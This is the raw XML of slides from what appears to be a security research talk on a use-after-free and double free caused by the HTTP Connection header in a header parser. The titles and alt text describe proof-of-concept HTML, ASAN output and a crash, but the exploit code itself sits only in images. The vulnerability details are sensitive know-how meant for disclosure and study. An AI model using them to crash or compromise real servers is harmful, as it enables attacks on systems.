            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1062971"/>
            <a:ext cx="7886700" cy="2066568"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91379886-93FB-A34C-9A03-CB84BDA6DAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162502" y="1940953"/>
            <a:ext cx="7352848" cy="2763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endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{405B1B53-4098-3A42-897D-CE76DCDAF8C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="3204839"/>
            <a:ext cx="7885508" cy="143741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Set BODY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" u="sng" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2587630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AEFC-0800-4F40-B10A-9A60B2DC6A7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Connection header creates a use after free ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DECDB96-AD41-064C-86F2-CEE52311BDAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1270216"/>
            <a:ext cx="7886700" cy="3196793"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64CAFA55-685B-DF45-BF80-FE624A7EF01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632281" y="3389062"/>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249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AEFC-0800-4F40-B10A-9A60B2DC6A7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection Header Creates UAF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Connection header creates a use after free ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DECDB96-AD41-064C-86F2-CEE52311BDAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="57741" b="33719"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="565901" y="1428214"/>
            <a:ext cx="7886700" cy="273000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64CAFA55-685B-DF45-BF80-FE624A7EF01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579015" y="1716761"/>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Content Placeholder 8" descr="Interpret all of the headers one by one">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36136F79-01BC-B741-8FB1-A98DE5A7B4C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397831" y="2269064"/>
            <a:ext cx="7886700" cy="2066568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04C7FD8-03F7-7449-A81B-728569A19CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1465085" y="3476020"/>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9F7183-DBE3-924F-B270-B9AC2BAB93D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021432" y="3193415"/>
            <a:ext cx="305718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143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D04921-A03B-4034-03F5-6A1DEE537DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of concept – HTML </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Connection header use after free proof of concept">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF65201A-76A5-2F42-B6BA-F23EF7DB2EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1124911"/>
            <a:ext cx="7886700" cy="2030826"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6092DAC3-132B-4E4F-877C-714288702030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3605340" y="1890944"/>
            <a:ext cx="1339522" cy="134052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BC8A64-FBE2-7840-91DC-326E3DF10116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1350914" y="2500508"/>
            <a:ext cx="0" cy="84637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3D818DBB-B39D-CB48-BECF-5ECBAB529A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209459" y="3231472"/>
            <a:ext cx="4797547"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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{360751F1-9420-1944-B9CD-57554A1D6C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209460" y="3231472"/>
            <a:ext cx="3536918"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2. Use the header ‘BBB’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Use after free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A71FB05-CB64-2147-B8E1-ED9DC47562FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3166622"/>
            <a:ext cx="3536918"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Free the header ‘BBB’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51F9A788-F562-3943-A7EA-89DB2EE6FDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2083706"/>
            <a:ext cx="305718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11B857C-72B7-574C-BBB1-EE21B599C519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2542122"/>
            <a:ext cx="6586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761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D613-4B00-EB46-9298-9D3BACD7F131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of Concept Result (ASAN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="ASAN finds use after free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06474FCA-AAF4-3944-A911-3568DE467CE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1268019"/>
            <a:ext cx="9116132" cy="534148"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="ASAN finds use after free with 8 byte read">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE437BF1-D685-3D44-B176-7751ACA300BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-27868" y="1863331"/>
            <a:ext cx="9144000" cy="797719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Use after free on header within simply reading a field">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{778D6459-A796-C447-9668-399A4B46A74D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-27868" y="3250412"/>
            <a:ext cx="9144000" cy="986379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A14B09-1EAB-E44F-965F-7EDA1C026763}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507994" y="3495594"/>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2702DD-2C8E-1A4F-9140-5C2BC5FF37A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-27868" y="2661050"/>
            <a:ext cx="174125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E2634E-A60E-3944-8B58-D29E4111B53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3205083" y="1517310"/>
            <a:ext cx="230795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792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CF51-ABC0-3841-BE22-B6E882DC90A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of Concept – Crash </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Use after free on req_header_lst. Name does NOT have a pointer, which leads to a crash. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B803BD-F4DA-D84F-973A-228A0F8EF8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3823" y="1372070"/>
            <a:ext cx="9147823" cy="1417999"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Object with use after free on it. Name does NOT have a pointer here to use">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E799E40-6FC7-034F-AE78-CC4681402D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2894120"/>
            <a:ext cx="5005488" cy="2249380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A54DFEBC-0CD8-574C-9CB0-E5D04804512C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3107184" y="1862103"/>
            <a:ext cx="292075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47957A-9723-5B44-9F5D-009AC886F0EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3719016"/>
            <a:ext cx="162461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8082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descr="Double free - do NOT crash on the read">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0E64E2-7451-1849-A604-1F0C86C7671C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1268019"/>
            <a:ext cx="7164436" cy="1772255"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D04921-A03B-4034-03F5-6A1DEE537DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proof of concept – HTML </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6092DAC3-132B-4E4F-877C-714288702030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1815232" y="2672179"/>
            <a:ext cx="3129630" cy="55929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3D818DBB-B39D-CB48-BECF-5ECBAB529A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209459" y="3231472"/>
            <a:ext cx="4797547"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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{360751F1-9420-1944-B9CD-57554A1D6C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209460" y="3231472"/>
            <a:ext cx="3536918"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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Use the header ‘BBB’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Use after free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A71FB05-CB64-2147-B8E1-ED9DC47562FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3166622"/>
            <a:ext cx="3536918"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Free the header ‘BBB’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51F9A788-F562-3943-A7EA-89DB2EE6FDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2083706"/>
